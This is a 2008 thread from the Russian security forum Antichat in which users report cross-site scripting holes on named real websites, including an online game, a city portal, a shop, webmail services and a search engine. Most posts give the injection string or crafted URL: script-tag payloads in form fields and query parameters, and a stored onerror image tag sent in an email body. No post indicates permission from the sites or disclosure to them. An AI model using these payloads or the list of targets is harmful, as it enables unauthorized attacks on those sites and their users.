ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #241  
Старый 24.08.2008, 17:35
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Вот нашол свою первую XSS

Онлайн игра azona.ru

Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
и вот XSS

ЗЫ вроде туда запостил если нет переместите в нужный раздел
 
Ответить с цитированием

  #242  
Старый 24.08.2008, 22:03
x-demon
Постоянный
Регистрация: 10.06.2007
Сообщений: 476
Провел на форуме:
924649

Репутация: 299
Отправить сообщение для x-demon с помощью ICQ Отправить сообщение для x-demon с помощью AIM Отправить сообщение для x-demon с помощью MSN Отправить сообщение для x-demon с помощью Yahoo
По умолчанию

Цитата:
Сообщение от diznt  
Вот нашол свою первую XSS

Онлайн игра azona.ru

Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
и вот XSS

ЗЫ вроде туда запостил если нет переместите в нужный раздел
Это пассивка вроде
А поля там все уязвимы..
 
Ответить с цитированием

  #243  
Старый 27.08.2008, 15:21
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию

http://hnu.univerlife.com/prepods/comps/14672/
 
Ответить с цитированием

  #244  
Старый 28.08.2008, 08:27
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Екатеринбурский крупнейший портал города:
www.e1.ru - там есть такая штука как фотоальбом, так в фотоальбоме к фотографиям есть поле "Название" к фотографиямесле там уязвимое поле под XSS
 
Ответить с цитированием

  #245  
Старый 31.08.2008, 21:52
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию

http://www.rozetka.com.ua/ru/products/comments/9217/index.html
 
Ответить с цитированием

  #246  
Старый 07.09.2008, 18:21
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

пассивные
http://noxak.ru/snak3_find.html , но на SMSline.Biz .
там стоит уже алерт. указываем телефон и гоу, да хоть алерт в форму телефона.


Довольно-таки крупный поисковик.
http://wwjd.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3B%3C%2 Fscript%3E
14 алертов

Последний раз редактировалось Sn@k3; 07.09.2008 в 18:31..
 
Ответить с цитированием

  #247  
Старый 11.09.2008, 22:25
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Активная xss в почтовике http://www.email.ro
Шлем в теле письма: <img src=1.gif onerror=xss>

Последний раз редактировалось BlackSun; 11.09.2008 в 22:28..
 
Ответить с цитированием

  #248  
Старый 20.09.2008, 16:23
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

wow.citynov.ru

Цитата:
http://wow.citynov.ru/index.php?n=account&sub=pms
В личных сообщениях не фильтруется поле "Тема".
 
Ответить с цитированием

  #249  
Старый 22.09.2008, 17:48
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

Estemail.com.ua - полуплатная говнопочта.

Тупо не фильтруется поле "Тема" в письме.
 
Ответить с цитированием

  #250  
Старый 22.09.2008, 21:31
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
По умолчанию

Универсальный оператор связи.
http://eltel.net/news/announcements/?id=%3Cscript%3Ealert('xss')%3C/script%3E
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ